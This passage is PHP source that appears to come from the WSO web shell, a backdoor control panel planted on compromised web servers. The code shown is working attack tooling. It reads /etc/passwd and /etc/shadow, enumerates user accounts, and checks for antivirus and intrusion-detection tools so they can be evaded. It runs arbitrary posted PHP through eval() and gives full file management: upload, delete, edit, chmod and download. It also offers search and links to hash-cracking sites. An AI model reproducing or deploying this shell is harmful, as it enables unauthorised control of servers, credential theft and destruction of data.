\\"passwd\\")\'>[view]</a>":\'no\');\n\r            wsoSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"/etc/\\", \\"shadow\\")\'>[view]</a>":\'no\');\n\r            wsoSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\n\r            wsoSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\n\r            if(!$GLOBALS[\'safe_mode\']) {\n\r                $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\n\r                $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\n\r                $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\n\r                echo \'<br>\';\n\r                $temp=array();\n\r                foreach ($userful as $item)\n\r                    if(wsoWhich($item))\n\r                        $temp[] = $item;\n\r                wsoSecParam(\'Userful\', implode(\', \',$temp));\n\r                $temp=array();\n\r                foreach ($danger as $item)\n\r                    if(wsoWhich($item))\n\r                        $temp[] = $item;\n\r                wsoSecParam(\'Danger\', implode(\', \',$temp));\n\r                $temp=array();\n\r                foreach ($downloaders as $item)\n\r                    if(wsoWhich($item))\n\r                        $temp[] = $item;\n\r                wsoSecParam(\'Downloaders\', implode(\', \',$temp));\n\r                echo \'<br/>\';\n\r                wsoSecParam(\'HDD space\', wsoEx(\'df -h\'));\n\r                wsoSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\n\r                echo \'<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\\\'g(null,null,"5",this.param1.value,this.param2.value);return false;\\\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>\';\n\r                if (isset ($_POST[\'p2\'], $_POST[\'p3\']) && is_numeric($_POST[\'p2\']) && is_numeric($_POST[\'p3\'])) {\n\r                    $temp = "";\n\r                    for(;$_POST[\'p2\'] <= $_POST[\'p3\'];$_POST[\'p2\']++) {\n\r                        $uid = @posix_getpwuid($_POST[\'p2\']);\n\r                        if ($uid)\n\r                            $temp .= join(\':\',$uid)."\\n";\n\r                    }\n\r                    echo \'<br/>\';\n\r                    wsoSecParam(\'Users\', $temp);\n\r                }\n\r            }\n\r\t} else {\n\r\t\twsoSecParam(\'OS Version\',wsoEx(\'ver\'));\n\r\t\twsoSecParam(\'Account Settings\',wsoEx(\'net accounts\'));\n\r\t\twsoSecParam(\'User Accounts\',wsoEx(\'net user\'));\n\r\t}\n\r\techo \'</div>\';\n\r\twsoFooter();\n\r}\n\r\n\rfunction actionPhp() {\n\r\tif(isset($_POST[\'ajax\'])) {\n\r        WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']) . \'ajax\', true);\n\r\t\tob_start();\n\r\t\teval($_POST[\'p1\']);\n\r\t\t$temp = "document.getElementById(\'PhpOutput\').style.display=\'\';document.getElementById(\'PhpOutput\').innerHTML=\'" . addcslashes(htmlspecialchars(ob_get_clean()), "\\n\\r\\t\\\\\'\\0") . "\';\\n";\n\r\t\techo strlen($temp), "\\n", $temp;\n\r\t\texit;\n\r\t}\n\r    if(empty($_POST[\'ajax\']) && !empty($_POST[\'p1\']))\n\r        WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']) . \'ajax\', 0);\n\r\n\r\twsoHeader();\n\r\tif(isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\')) {\n\r\t\techo \'<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>\';\n\r\t\tob_start();\n\r\t\tphpinfo();\n\r\t\t$tmp = ob_get_clean();\n\r        $tmp = preg_replace(array (\n\r            \'!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU\',\n\r            \'!td, th {(.*)}!msiU\',\n\r            \'!<img[^>]+>!msiU\',\n\r        ), array (\n\r            \'\',\n\r            \'.e, .v, .h, .h th {$1}\',\n\r            \'\'\n\r        ), $tmp);\n\r\t\techo str_replace(\'<h1\',\'<h2\', $tmp) .\'</div><br>\';\n\r\t}\n\r    echo \'<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\\\'Php\\\',null,this.code.value);}else{g(\\\'Php\\\',null,this.code.value,\\\'\\\');}return false;"><textarea name=code class=bigarea id=PhpCode>\'.(!empty($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'</textarea><input type=submit value=Eval style="margin-top:5px">\';\n\r\techo \' <input type=checkbox name=ajax value=1 > send using AJAX</form><pre id=PhpOutput style="\'.(empty($_POST[\'p1\'])?\'display:none;\':\'\').\'margin-top:5px;" class=ml1>\';\n\r\tif(!empty($_POST[\'p1\'])) {\n\r\t\tob_start();\n\r\t\teval($_POST[\'p1\']);\n\r\t\techo htmlspecialchars(ob_get_clean());\n\r\t}\n\r\techo \'</pre></div>\';\n\r\twsoFooter();\n\r}\n\r\n\rfunction actionFilesMan() {\n\r    if (!empty ($_COOKIE[\'f\']))\n\r        $_COOKIE[\'f\'] = @unserialize($_COOKIE[\'f\']);\n\r    \n\r\tif(!empty($_POST[\'p1\'])) {\n\r\t\tswitch($_POST[\'p1\']) {\n\r\t\t\tcase \'uploadFile\':\n\r\t\t\t\tif(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\']))\n\r\t\t\t\t\techo "Can\'t upload file!";\n\r\t\t\t\tbreak;\n\r\t\t\tcase \'mkdir\':\n\r\t\t\t\tif(!@mkdir($_POST[\'p2\']))\n\r\t\t\t\t\techo "Can\'t create new dir";\n\r\t\t\t\tbreak;\n\r\t\t\tcase \'delete\':\n\r\t\t\t\tfunction deleteDir($path) {\n\r\t\t\t\t\t$path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\n\r\t\t\t\t\t$dh  = opendir($path);\n\r\t\t\t\t\twhile ( ($item = readdir($dh) ) !== false) {\n\r\t\t\t\t\t\t$item = $path.$item;\n\r\t\t\t\t\t\tif ( (basename($item) == "..") || (basename($item) == ".") )\n\r\t\t\t\t\t\t\tcontinue;\n\r\t\t\t\t\t\t$type = filetype($item);\n\r\t\t\t\t\t\tif ($type == "dir")\n\r\t\t\t\t\t\t\tdeleteDir($item);\n\r\t\t\t\t\t\telse\n\r\t\t\t\t\t\t\t@unlink($item);\n\r\t\t\t\t\t}\n\r\t\t\t\t\tclosedir($dh);\n\r\t\t\t\t\t@rmdir($path);\n\r\t\t\t\t}\n\r\t\t\t\tif(is_array(@$_POST[\'f\']))\n\r\t\t\t\t\tforeach($_POST[\'f\'] as $f) {\n\r                        if($f == \'..\')\n\r                            continue;\n\r\t\t\t\t\t\t$f = urldecode($f);\n\r\t\t\t\t\t\tif(is_dir($f))\n\r\t\t\t\t\t\t\tdeleteDir($f);\n\r\t\t\t\t\t\telse\n\r\t\t\t\t\t\t\t@unlink($f);\n\r\t\t\t\t\t}\n\r\t\t\t\tbreak;\n\r\t\t\tcase \'paste\':\n\r\t\t\t\tif($_COOKIE[\'act\'] == \'copy\') {\n\r\t\t\t\t\tfunction copy_paste($c,$s,$d){\n\r\t\t\t\t\t\tif(is_dir($c.$s)){\n\r\t\t\t\t\t\t\tmkdir($d.$s);\n\r\t\t\t\t\t\t\t$h = @opendir($c.$s);\n\r\t\t\t\t\t\t\twhile (($f = @readdir($h)) !== false)\n\r\t\t\t\t\t\t\t\tif (($f != ".") and ($f != ".."))\n\r\t\t\t\t\t\t\t\t\tcopy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\n\r\t\t\t\t\t\t} elseif(is_file($c.$s))\n\r\t\t\t\t\t\t\t@copy($c.$s, $d.$s);\n\r\t\t\t\t\t}\n\r\t\t\t\t\tforeach($_COOKIE[\'f\'] as $f)\n\r\t\t\t\t\t\tcopy_paste($_COOKIE[\'c\'],$f, $GLOBALS[\'cwd\']);\n\r\t\t\t\t} elseif($_COOKIE[\'act\'] == \'move\') {\n\r\t\t\t\t\tfunction move_paste($c,$s,$d){\n\r\t\t\t\t\t\tif(is_dir($c.$s)){\n\r\t\t\t\t\t\t\tmkdir($d.$s);\n\r\t\t\t\t\t\t\t$h = @opendir($c.$s);\n\r\t\t\t\t\t\t\twhile (($f = @readdir($h)) !== false)\n\r\t\t\t\t\t\t\t\tif (($f != ".") and ($f != ".."))\n\r\t\t\t\t\t\t\t\t\tcopy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\n\r\t\t\t\t\t\t} elseif(@is_file($c.$s))\n\r\t\t\t\t\t\t\t@copy($c.$s, $d.$s);\n\r\t\t\t\t\t}\n\r\t\t\t\t\tforeach($_COOKIE[\'f\'] as $f)\n\r\t\t\t\t\t\t@rename($_COOKIE[\'c\'].$f, $GLOBALS[\'cwd\'].$f);\n\r\t\t\t\t} elseif($_COOKIE[\'act\'] == \'zip\') {\n\r\t\t\t\t\tif(class_exists(\'ZipArchive\')) {\n\r                        $zip = new ZipArchive();\n\r                        if ($zip->open($_POST[\'p2\'], 1)) {\n\r                            chdir($_COOKIE[\'c\']);\n\r                            foreach($_COOKIE[\'f\'] as $f) {\n\r                                if($f == \'..\')\n\r                                    continue;\n\r                                if(@is_file($_COOKIE[\'c\'].$f))\n\r                                    $zip->addFile($_COOKIE[\'c\'].$f, $f);\n\r                                elseif(@is_dir($_COOKIE[\'c\'].$f)) {\n\r                                    $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.\'/\', FilesystemIterator::SKIP_DOTS));\n\r                                    foreach ($iterator as $key=>$value) {\n\r                                        $zip->addFile(realpath($key), $key);\n\r                                    }\n\r                                }\n\r                            }\n\r                            chdir($GLOBALS[\'cwd\']);\n\r                            $zip->close();\n\r                        }\n\r                    }\n\r\t\t\t\t} elseif($_COOKIE[\'act\'] == \'unzip\') {\n\r\t\t\t\t\tif(class_exists(\'ZipArchive\')) {\n\r                        $zip = new ZipArchive();\n\r                        foreach($_COOKIE[\'f\'] as $f) {\n\r                            if($zip->open($_COOKIE[\'c\'].$f)) {\n\r                                $zip->extractTo($GLOBALS[\'cwd\']);\n\r                                $zip->close();\n\r                            }\n\r                        }\n\r                    }\n\r\t\t\t\t} elseif($_COOKIE[\'act\'] == \'tar\') {\n\r                    chdir($_COOKIE[\'c\']);\n\r                    $_COOKIE[\'f\'] = array_map(\'escapeshellarg\', $_COOKIE[\'f\']);\n\r                    wsoEx(\'tar cfzv \' . escapeshellarg($_POST[\'p2\']) . \' \' . implode(\' \', $_COOKIE[\'f\']));\n\r                    chdir($GLOBALS[\'cwd\']);\n\r\t\t\t\t}\n\r\t\t\t\tunset($_COOKIE[\'f\']);\n\r                setcookie(\'f\', \'\', time() - 3600);\n\r\t\t\t\tbreak;\n\r\t\t\tdefault:\n\r                if(!empty($_POST[\'p1\'])) {\n\r\t\t\t\t\tWSOsetcookie(\'act\', $_POST[\'p1\']);\n\r\t\t\t\t\tWSOsetcookie(\'f\', serialize(@$_POST[\'f\']));\n\r\t\t\t\t\tWSOsetcookie(\'c\', @$_POST[\'c\']);\n\r\t\t\t\t}\n\r\t\t\t\tbreak;\n\r\t\t}\n\r\t}\n\r    wsoHeader();\n\r\techo \'<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>\';\n\r\t$dirContent = wsoScandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\n\r\tif($dirContent === false) {\techo \'Can\\\'t open this folder!\';wsoFooter(); return; }\n\r\tglobal $sort;\n\r\t$sort = array(\'name\', 1);\n\r\tif(!empty($_POST[\'p1\'])) {\n\r\t\tif(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match))\n\r\t\t\t$sort = array($match[1], (int)$match[2]);\n\r\t}\n\recho "<script>\n\r\tfunction sa() {\n\r\t\tfor(i=0;i<d.files.elements.length;i++)\n\r\t\t\tif(d.files.elements[i].type == \'checkbox\')\n\r\t\t\t\td.files.elements[i].checked = d.files.elements[0].checked;\n\r\t}\n\r</script>\n\r<table width=\'100%\' class=\'main\' cellspacing=\'0\' cellpadding=\'2\'>\n\r<form name=files method=post><tr><th width=\'13px\'><input type=checkbox onclick=\'sa()\' class=chkbx></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_name_".($sort[1]?0:1)."\\")\'>Name</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_size_".($sort[1]?0:1)."\\")\'>Size</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_modify_".($sort[1]?0:1)."\\")\'>Modify</a></th><th>Owner/Group</th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_perms_".($sort[1]?0:1)."\\")\'>Permissions</a></th><th>Actions</th></tr>";\n\r\t$dirs = $files = array();\n\r\t$n = count($dirContent);\n\r\tfor($i=0;$i<$n;$i++) {\n\r\t\t$ow = @posix_getpwuid(@fileowner($dirContent[$i]));\n\r\t\t$gr = @posix_getgrgid(@filegroup($dirContent[$i]));\n\r\t\t$tmp = array(\'name\' => $dirContent[$i],\n\r\t\t\t\t\t \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i],\n\r\t\t\t\t\t \'modify\' => date(\'Y-m-d H:i:s\', @filemtime($GLOBALS[\'cwd\'] . $dirContent[$i])),\n\r\t\t\t\t\t \'perms\' => wsoPermsColor($GLOBALS[\'cwd\'] . $dirContent[$i]),\n\r\t\t\t\t\t \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]),\n\r\t\t\t\t\t \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]),\n\r\t\t\t\t\t \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i])\n\r\t\t\t\t\t);\n\r\t\tif(@is_file($GLOBALS[\'cwd\'] . $dirContent[$i]))\n\r\t\t\t$files[] = array_merge($tmp, array(\'type\' => \'file\'));\n\r\t\telseif(@is_link($GLOBALS[\'cwd\'] . $dirContent[$i]))\n\r\t\t\t$dirs[] = array_merge($tmp, array(\'type\' => \'link\', \'link\' => readlink($tmp[\'path\'])));\n\r\t\telseif(@is_dir($GLOBALS[\'cwd\'] . $dirContent[$i]))\n\r\t\t\t$dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\n\r\t}\n\r\t$GLOBALS[\'sort\'] = $sort;\n\r\tfunction wsoCmp($a, $b) {\n\r\t\tif($GLOBALS[\'sort\'][0] != \'size\')\n\r\t\t\treturn strcmp(strtolower($a[$GLOBALS[\'sort\'][0]]), strtolower($b[$GLOBALS[\'sort\'][0]]))*($GLOBALS[\'sort\'][1]?1:-1);\n\r\t\telse\n\r\t\t\treturn (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\n\r\t}\n\r\tusort($files, "wsoCmp");\n\r\tusort($dirs, "wsoCmp");\n\r\t$files = array_merge($dirs, $files);\n\r\t$l = 0;\n\r\tforeach($files as $f) {\n\r\t\techo \'<tr\'.($l?\' class=l1\':\'\').\'><td><input type=checkbox name="f[]" value="\'.urlencode($f[\'name\']).\'" class=chkbx></td><td><a href=# onclick="\'.(($f[\'type\']==\'file\')?\'g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'view\\\')">\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');" \' . (empty ($f[\'link\']) ? \'\' : "title=\'{$f[\'link\']}\'") . \'><b>[ \' . htmlspecialchars($f[\'name\']) . \' ]</b>\').\'</a></td><td>\'.(($f[\'type\']==\'file\')?wsoViewSize($f[\'size\']):$f[\'type\']).\'</td><td>\'.$f[\'modify\'].\'</td><td>\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</td><td><a href=# onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\',\\\'chmod\\\')">\'.$f[\'perms\']\n\r\t\t\t.\'</td><td><a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'rename\\\')">R</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'touch\\\')">T</a>\'.(($f[\'type\']==\'file\')?\' <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'edit\\\')">E</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'download\\\')">D</a>\':\'\').\'</td></tr>\';\n\r\t\t$l = $l?0:1;\n\r\t}\n\r\techo "<tr><td colspan=7>\n\r\t<input type=hidden name=a value=\'FilesMan\'>\n\r\t<input type=hidden name=c value=\'" . htmlspecialchars($GLOBALS[\'cwd\']) ."\'>\n\r\t<input type=hidden name=charset value=\'". (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\')."\'>\n\r\t<select name=\'p1\'><option value=\'copy\'>Copy</option><option value=\'move\'>Move</option><option value=\'delete\'>Delete</option>";\n\r    if(class_exists(\'ZipArchive\'))\n\r        echo "<option value=\'zip\'>Compress (zip)</option><option value=\'unzip\'>Uncompress (zip)</option>";\n\r    echo "<option value=\'tar\'>Compress (tar.gz)</option>";\n\r    if(!empty($_COOKIE[\'act\']) && @count($_COOKIE[\'f\']))\n\r        echo "<option value=\'paste\'>Paste / Compress</option>";\n\r    echo "</select>&nbsp;";\n\r    if(!empty($_COOKIE[\'act\']) && @count($_COOKIE[\'f\']) && (($_COOKIE[\'act\'] == \'zip\') || ($_COOKIE[\'act\'] == \'tar\')))\n\r        echo "file name: <input type=text name=p2 value=\'wso_" . date("Ymd_His") . "." . ($_COOKIE[\'act\'] == \'zip\'?\'zip\':\'tar.gz\') . "\'>&nbsp;";\n\r    echo "<input type=\'submit\' value=\'>>\'></td></tr></form></table></div>";\n\r\twsoFooter();\n\r}\n\r\n\rfunction actionStringTools() {\n\r\tif(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));}}\n\r    if(!function_exists(\'binhex\')) {function binhex($p) {return dechex(bindec($p));}}\n\r\tif(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}\n\r\tif(!function_exists(\'ascii2hex\')) {function ascii2hex($p){$r=\'\';for($i=0;$i<strlen($p);++$i)$r.= sprintf(\'%02X\',ord($p[$i]));return strtoupper($r);}}\n\r\tif(!function_exists(\'full_urlencode\')) {function full_urlencode($p){$r=\'\';for($i=0;$i<strlen($p);++$i)$r.= \'%\'.dechex(ord($p[$i]));return strtoupper($r);}}\n\r\t$stringTools = array(\n\r\t\t\'Base64 encode\' => \'base64_encode\',\n\r\t\t\'Base64 decode\' => \'base64_decode\',\n\r\t\t\'Url encode\' => \'urlencode\',\n\r\t\t\'Url decode\' => \'urldecode\',\n\r\t\t\'Full urlencode\' => \'full_urlencode\',\n\r\t\t\'md5 hash\' => \'md5\',\n\r\t\t\'sha1 hash\' => \'sha1\',\n\r\t\t\'crypt\' => \'crypt\',\n\r\t\t\'CRC32\' => \'crc32\',\n\r\t\t\'ASCII to HEX\' => \'ascii2hex\',\n\r\t\t\'HEX to ASCII\' => \'hex2ascii\',\n\r\t\t\'HEX to DEC\' => \'hexdec\',\n\r\t\t\'HEX to BIN\' => \'hex2bin\',\n\r\t\t\'DEC to HEX\' => \'dechex\',\n\r\t\t\'DEC to BIN\' => \'decbin\',\n\r\t\t\'BIN to HEX\' => \'binhex\',\n\r\t\t\'BIN to DEC\' => \'bindec\',\n\r\t\t\'String to lower case\' => \'strtolower\',\n\r\t\t\'String to upper case\' => \'strtoupper\',\n\r\t\t\'Htmlspecialchars\' => \'htmlspecialchars\',\n\r\t\t\'String length\' => \'strlen\',\n\r\t);\n\r\tif(isset($_POST[\'ajax\'])) {\n\r\t\tWSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', true);\n\r\t\tob_start();\n\r\t\tif(in_array($_POST[\'p1\'], $stringTools))\n\r\t\t\techo $_POST[\'p1\']($_POST[\'p2\']);\n\r\t\t$temp = "document.getElementById(\'strOutput\').style.display=\'\';document.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\\n";\n\r\t\techo strlen($temp), "\\n", $temp;\n\r\t\texit;\n\r\t}\n\r    if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))\n\r\t\tWSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', 0);\n\r\twsoHeader();\n\r\techo \'<h1>String conversions</h1><div class=content>\';\n\r\techo "<form name=\'toolsForm\' onSubmit=\'if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;\'><select name=\'selectTool\'>";\n\r\tforeach($stringTools as $k => $v)\n\r\t\techo "<option value=\'".htmlspecialchars($v)."\'>".$k."</option>";\n\r\t\techo "</select><input type=\'submit\' value=\'>>\'/> <input type=checkbox name=ajax value=1 > send using AJAX<br><textarea name=\'input\' style=\'margin-top:5px\' class=bigarea>".(empty($_POST[\'p1\'])?\'\':htmlspecialchars(@$_POST[\'p2\']))."</textarea></form><pre class=\'ml1\' style=\'".(empty($_POST[\'p1\'])?\'display:none;\':\'\')."margin-top:5px\' id=\'strOutput\'>";\n\r\tif(!empty($_POST[\'p1\'])) {\n\r\t\tif(in_array($_POST[\'p1\'], $stringTools))echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));\n\r\t}\n\r\techo"</pre></div><br><h1>Search files:</h1><div class=content>\n\r\t\t<form onsubmit=\\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\\"><table cellpadding=\'1\' cellspacing=\'0\' width=\'50%\'>\n\r\t\t\t<tr><td width=\'1%\'>Text:</td><td><input type=\'text\' name=\'text\' style=\'width:100%\'></td></tr>\n\r\t\t\t<tr><td>Path:</td><td><input type=\'text\' name=\'cwd\' value=\'". htmlspecialchars($GLOBALS[\'cwd\']) ."\' style=\'width:100%\'></td></tr>\n\r\t\t\t<tr><td>Name:</td><td><input type=\'text\' name=\'filename\' value=\'*\' style=\'width:100%\'></td></tr>\n\r\t\t\t<tr><td></td><td><input type=\'submit\' value=\'>>\'></td></tr>\n\r\t\t\t</table></form>";\n\r\n\r\tfunction wsoRecursiveGlob($path) {\n\r\t\tif(substr($path, -1) != \'/\')\n\r\t\t\t$path.=\'/\';\n\r\t\t$paths = @array_unique(@array_merge(@glob($path.$_POST[\'p3\']), @glob($path.\'*\', GLOB_ONLYDIR)));\n\r\t\tif(is_array($paths)&&@count($paths)) {\n\r\t\t\tforeach($paths as $item) {\n\r\t\t\t\tif(@is_dir($item)){\n\r\t\t\t\t\tif($path!=$item)\n\r\t\t\t\t\t\twsoRecursiveGlob($item);\n\r\t\t\t\t} else {\n\r\t\t\t\t\tif(empty($_POST[\'p2\']) || @strpos(file_get_contents($item), $_POST[\'p2\'])!==false)\n\r\t\t\t\t\t\techo "<a href=\'#\' onclick=\'g(\\"FilesTools\\",null,\\"".urlencode($item)."\\", \\"view\\",\\"\\")\'>".htmlspecialchars($item)."</a><br>";\n\r\t\t\t\t}\n\r\t\t\t}\n\r\t\t}\n\r\t}\n\r\tif(@$_POST[\'p3\'])\n\r\t\twsoRecursiveGlob($_POST[\'c\']);\n\r\techo "</div><br><h1>Search for hash:</h1><div class=content>\n\r\t\t<form method=\'post\' target=\'_blank\' name=\'hf\'>\n\r\t\t\t<input type=\'text\' name=\'hash\' style=\'width:200px;\'><br>\n\r            <input type=\'hidden\' name=\'act\' value=\'find\'/>\n\r\t\t\t<input type=\'button\' value=\'hashcracking.ru\' onclick=\\"document.hf.action=\'https://hashcracking.ru/index.php\';document.hf.submit()\\"><br>\n\r\t\t\t<input type=\'button\' value=\'md5.rednoize.com\' onclick=\\"document.hf.action=\'http://md5.rednoize.com/?q=\'+document.hf.hash.value+\'&s=md5\';document.hf.submit()\\"><br>\n\r            <input type=\'button\' value=\'crackfor.me\' onclick=\\"document.hf.action=\'http://crackfor.me/index.php\';document.hf.submit()\\"><br>\n\r\t\t</form></div>";\n\r\twsoFooter();\n\r}\n\r\n\rfunction actionFilesTools() {\n\r\tif( isset($_POST[\'p1\']) )\n\r\t\t$_POST[\'p1\'] = urldecode($_POST[\'p1\']);\n\r\tif(@$_POST[\'p2\']==\'download\') {\n\r\t\tif(@is_file($_POST[\'p1\']) && @is_readable($_POST[\'p1\'])) {\n\r\t\t\tob_start("ob_gzhandler", 4096);\n\r\t\t\theader("Content-Disposition: attachment; filename=".basename($_POST[\'p1\']));\n\r\t\t\tif (function_exists("mime_content_type")) {\n\r\t\t\t\t$type = @mime_content_type($_POST[\'p1\']);\n\r\t\t\t\theader("Content-Type: " . $type);\n\r\t\t\t} else\n\r                header("Content-Type: application/octet-stream");\n\r\t\t\t$fp = @fopen($_POST[\'p1\'], "r");\n\r\t\t\tif($fp) {\n\r\t\t\t\twhile(!@feof($fp))\n\r\t\t\t\t\techo @fread($fp, 1024);\n\r\t\t\t\tfclose($fp);\n\r\t\t\t}\n\r\t\t}exit;\n\r\t}\n\r\tif( @$_POST[\'p2\'] == \'mkfile\' ) {\n\r\t\tif(!file_exists($_POST[\'p1\'])) {\n\r\t\t\t$fp = @fopen($_POST[\'p1\'], \'w\');\n\r\t\t\tif($fp) {\n\r\t\t\t\t$_POST[\'p2\'] = "edit";\n\r\t\t\t\tfclose($fp);\n\r\t\t\t}\n\r\t\t}\n\r\t}\n\r\twsoHeader();\n\r\techo \'<h1>File tools</h1><div class=content>\';\n\r\tif( !file_exists(@$_POST[\'p1\']) ) {\n\r\t\techo \'File not exists\';\n\r\t\twsoFooter();\n\r\t\treturn;\n\r\t}\n\r\t$uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\n\r\tif(!$uid) {\n\r\t\t$uid[\'name\'] = @fileowner($_POST[\'p1\']);\n\r\t\t$gid[\'name\'] = @filegroup($_POST[\'p1\']);\n\r\t} else $gid = @posix_getgrgid(@filegroup($_POST[\'p1\']));\n\r\techo \'<span>Name:</span> \'.htmlspecialchars(@basename($_POST[\'p1\'])).\' <span>Size:</span> \'.(is_file($_POST[\'p1\'])?wsoViewSize(filesize($_POST[\'p1\'])):\'-\').\' <span>Permission:</span> \'.wsoPermsColor($_POST[\'p1\']).\' <span>Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'<br>\';\n\r\techo \'<span>Change time:</span> \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' <span>Access time:</span> \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' <span>Modify time:</span> \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'<br><br>\';\n\r\tif( empty($_POST[\'p2\']) )\n\r\t\t$_POST[\'p2\'] = \'view\';\n\r\tif( is_file($_POST[\'p1\']) )\n\r\t\t$m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\');\n\r\telse\n\r\t\t$m = array(\'Chmod\', \'Rename\', \'Touch\');\n\r\tforeach($m as $v)\n\r\t\techo \'<a href=# onclick="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',\\\'\'.strtolower($v).\'\\\')">\'.((strtolower($v)==@$_POST[\'p2\'])?\'<b>[ \'.$v.\' ]</b>\':$v).\'</a> \';\n\r\techo \'<br><br>\';\n\r\tswitch($_POST[\'p2\']) {\n\r\t\tcase \'view\':\n\r\t\t\techo \'<pre class=ml1>\';\n\r\t\t\t$fp = @fopen($_POST[\'p1\'], \'r\');\n\r\t\t\tif($fp) {\n\r\t\t\t\twhile( !@feof($fp) )\n\r\t\t\t\t\techo htmlspecialchars(@fread($fp, 1024));\n\r\t\t\t\t@fclose($fp);\n\r\t\t\t}\n\r\t\t\techo \'</pre>\';\n\r\t\t\tbreak;\n\r\t\tcase \'highlight\':\n\r\t\t\tif( @is_readable($_POST[\'p1\']) ) {\n\r\t\t\t\techo \'<div class=ml1 style="background-color: #e1e1e1;color:black;">\';\n\r\t\t\t\t$code = @highlight_file($_POST[\'p1\'],true);\n\r\t\t\t\techo str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$code).\'</div>\';\n\r\t\t\t}\n\r\t\t\tbreak;\n\r\t\tcase \'chmod\':\n\r\t\t\tif( !empty($_POST[\'p3\']) ) {\n\r\t\t\t\t$perms = 0;\n\r\t\t\t\tfor($i=strlen($_POST[\'p3\'])-1;$i>=0;--$i)\n\r\t\t\t\t\t$perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\n\r\t\t\t\tif(!@chmod($_POST[\'p1\'], $perms))\n\r\t\t\t\t\techo \'Can\\\'t set permissions!<br><script>document.mf.p3.value="";</script>\';\n\r\t\t\t}\n\r\t\t\tclearstatcache();\n\r\t\t\techo \'<script>p3_="";</script><form onsubmit="g(null,null,\\\'\' . 